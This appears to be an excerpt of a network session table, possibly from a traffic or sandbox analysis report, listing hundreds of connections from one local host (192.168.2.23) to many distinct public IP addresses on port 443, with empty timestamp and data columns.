                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15923192.168.2.2351620149.4.141.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15924192.168.2.234115061.217.138.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15925192.168.2.235754224.230.225.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15926192.168.2.2344620169.149.193.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15927192.168.2.2355526173.44.27.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15928192.168.2.2356760125.237.245.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15929192.168.2.2349294126.181.150.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15930192.168.2.2342338201.91.194.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15931192.168.2.2336238191.77.15.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15932192.168.2.2340840218.50.235.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15933192.168.2.234076885.103.39.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15934192.168.2.2336818121.176.184.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15935192.168.2.234969265.159.243.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15936192.168.2.2347284136.106.130.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15937192.168.2.233411045.154.20.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15938192.168.2.235783839.210.77.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15939192.168.2.2342678116.218.183.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15940192.168.2.2358844103.40.217.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15941192.168.2.2347038202.83.92.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15942192.168.2.234163081.204.97.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15943192.168.2.2337994171.156.59.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15944192.168.2.233648023.249.208.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15945192.168.2.2351660203.37.200.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15946192.168.2.235632866.125.14.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15947192.168.2.233633412.6.35.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15948192.168.2.235855651.49.54.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15949192.168.2.2335130199.175.216.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15950192.168.2.2342992112.7.194.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15951192.168.2.233628881.207.114.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15952192.168.2.235557847.193.59.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15953192.168.2.234973473.228.80.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15954192.168.2.2339544130.33.19.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15955192.168.2.233309264.56.191.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15956192.168.2.235685076.14.109.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15957192.168.2.2339440177.227.85.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15958192.168.2.2357914105.150.125.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15959192.168.2.2336882118.109.225.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15960192.168.2.2335826152.189.234.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15961192.168.2.2334234156.191.235.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15962192.168.2.2343222156.199.29.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15963192.168.2.2337860121.240.103.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15964192.168.2.23594888.186.245.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15965192.168.2.2357162119.151.51.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15966192.168.2.2347428183.126.192.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15967192.168.2.2336122159.132.78.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15968192.168.2.2335052186.75.172.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15969192.168.2.23591345.207.15.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15970192.168.2.235310069.41.205.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15971192.168.2.2354466116.68.203.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15972192.168.2.2342860147.174.17.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15973192.168.2.233871269.4.58.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15974192.168.2.2345032154.40.42.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15975192.168.2.2347302141.53.142.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15976192.168.2.2353896148.236.149.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15977192.168.2.2340998218.230.127.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15978192.168.2.2347560177.143.158.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15979192.168.2.2344654130.227.211.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15980192.168.2.233580450.245.66.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15981192.168.2.2334672223.228.249.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15982192.168.2.235270867.54.152.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15983192.168.2.2345992201.77.121.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15984192.168.2.2336080117.139.140.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15985192.168.2.234148020.204.64.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15986192.168.2.2351116208.17.114.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15987192.168.2.2342974102.93.157.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15988192.168.2.235407073.212.248.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15989192.168.2.235326839.46.203.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15990192.168.2.233349059.210.191.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15991192.168.2.235100636.14.139.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15992192.168.2.235611668.177.83.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15993192.168.2.2344328137.178.134.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15994192.168.2.2346872201.86.223.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15995192.168.2.2359140206.32.203.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15996192.168.2.2335170122.98.142.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15997192.168.2.2336058122.94.87.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15998192.168.2.2352530112.251.50.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15999192.168.2.2353214172.242.243.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16000192.168.2.233895665.68.118.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16001192.168.2.2345304200.150.70.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16002192.168.2.2344716208.74.83.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16003192.168.2.2353104147.90.142.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16004192.168.2.2354642192.239.174.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16005192.168.2.2339252132.241.59.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16006192.168.2.2342544123.219.227.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16007192.168.2.2360470111.185.182.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16008192.168.2.2345782213.217.35.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16009192.168.2.2339038115.88.206.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16010192.168.2.235895027.218.53.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16011192.168.2.2345540187.16.45.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16012192.168.2.2341956190.170.23.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16013192.168.2.2344140118.11.197.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16014192.168.2.235837818.247.219.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16015192.168.2.2343986141.15.37.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16016192.168.2.2340806136.147.136.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16017192.168.2.2346310104.177.133.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16018192.168.2.233910014.203.64.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16019192.168.2.2356466103.249.145.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16020192.168.2.2359912134.201.244.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16021192.168.2.2355650223.208.19.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16022192.168.2.2333376121.69.18.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16023192.168.2.2334570171.44.14.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16024192.168.2.2344998131.6.133.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16025192.168.2.233805427.246.76.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16026192.168.2.2335678101.85.116.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16027192.168.2.2338192199.161.24.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16028192.168.2.236037834.248.222.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16029192.168.2.235435839.225.9.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16030192.168.2.2343372109.131.237.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16031192.168.2.235931894.27.145.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16032192.168.2.2337436131.220.144.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16033192.168.2.2335248218.143.224.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16034192.168.2.234909864.139.63.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16035192.168.2.2355310219.44.112.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16036192.168.2.2333716187.131.25.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16037192.168.2.2349458125.1.242.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16038192.168.2.2341574179.20.90.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16039192.168.2.235798854.248.151.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16040192.168.2.233708461.198.66.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16041192.168.2.2342180176.74.200.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16042192.168.2.2338012174.240.199.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16043192.168.2.235142076.58.21.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16044192.168.2.2334502201.27.199.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16045192.168.2.233813842.149.148.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16046192.168.2.235133672.206.198.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16047192.168.2.2347492208.201.147.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16048192.168.2.234161234.70.155.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16049192.168.2.2340970196.121.125.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16050192.168.2.234363666.172.116.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16051192.168.2.2346096174.42.2.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16052192.168.2.235550073.44.209.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16053192.168.2.233784862.18.163.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16054192.168.2.233531849.198.43.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16055192.168.2.2341812146.29.54.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16056192.168.2.2355560123.182.59.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16057192.168.2.2341892111.121.165.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16058192.168.2.235934412.215.207.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16059192.168.2.235780092.94.34.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16060192.168.2.2342194118.1.199.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16061192.168.2.234871239.174.19.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16062192.168.2.2352268125.221.97.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16063192.168.2.234260079.243.38.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16064192.168.2.233547832.133.47.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16065192.168.2.2345480175.119.216.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16066192.168.2.234025463.248.212.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16067192.168.2.234525053.129.153.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16068192.168.2.23366109.208.5.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16069192.168.2.235839061.132.201.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16070192.168.2.234723872.156.190.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16071192.168.2.2347926136.45.24.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16072192.168.2.234164820.2.73.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16073192.168.2.233605041.154.78.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16074192.168.2.236064876.123.55.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16075192.168.2.2350814147.129.158.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16076192.168.2.235487283.195.238.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16077192.168.2.2352818191.115.52.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16078192.168.2.233859418.147.187.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16079192.168.2.2352556129.22.102.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16080192.168.2.2345234220.200.138.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16081192.168.2.233737295.23.201.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16082192.168.2.235216670.65.63.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16083192.168.2.2340224205.197.34.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16084192.168.2.2353908119.57.72.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16085192.168.2.23403522.49.177.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16086192.168.2.2348220145.34.221.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16087192.168.2.2344962143.74.64.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16088192.168.2.234768671.132.144.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16089192.168.2.2346614104.60.185.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16090192.168.2.234508695.86.219.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16091192.168.2.2335902201.143.81.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16092192.168.2.2342882187.92.230.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16093192.168.2.2341274134.125.47.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16094192.168.2.235438284.203.83.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16095192.168.2.234336625.186.23.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16096192.168.2.2348524165.224.74.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16097192.168.2.2352526119.196.11.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16098192.168.2.233892683.36.25.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16099192.168.2.235822657.176.65.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16100192.168.2.2351606100.177.29.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16101192.168.2.235181451.201.58.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16102192.168.2.23447922.191.233.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16103192.168.2.234962234.208.121.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16104192.168.2.2349016207.243.34.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16105192.168.2.2343680197.205.205.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16106192.168.2.2347034174.200.60.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16107192.168.2.2351782185.163.171.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16108192.168.2.2356186112.28.105.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16109192.168.2.235513032.170.120.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16110192.168.2.23401505.82.232.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16111192.168.2.23572301.4.226.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16112192.168.2.2348134181.117.254.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16113192.168.2.2358416218.89.185.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16114192.168.2.235903665.16.182.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16115192.168.2.235744462.92.106.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16116192.168.2.2357646155.48.167.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16117192.168.2.2347000149.44.82.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16118192.168.2.233499276.234.48.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16119192.168.2.2341730163.231.205.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16120192.168.2.235242697.214.4.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16121192.168.2.2343112211.57.6.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16122192.168.2.234369066.27.7.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16123192.168.2.2335056157.227.249.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16124192.168.2.2334904107.9.195.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16125192.168.2.233872442.176.162.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16126192.168.2.233911814.70.51.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16127192.168.2.2339802157.79.46.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16128192.168.2.2342900151.68.236.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16129192.168.2.235618012.217.104.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16130192.168.2.235764276.1.55.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16131192.168.2.235784665.20.29.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16132192.168.2.2344242116.214.87.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16133192.168.2.2343078139.108.83.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16134192.168.2.2335540178.49.213.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16135192.168.2.2360806199.26.27.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16136192.168.2.2357776219.13.143.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16137192.168.2.2352402174.222.80.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16138192.168.2.2338332221.82.165.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16139192.168.2.2353210110.136.177.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16140192.168.2.2347482204.102.164.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16141192.168.2.23356429.102.87.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16142192.168.2.2337298115.208.43.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16143192.168.2.235606684.204.240.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16144192.168.2.234573413.162.60.178443
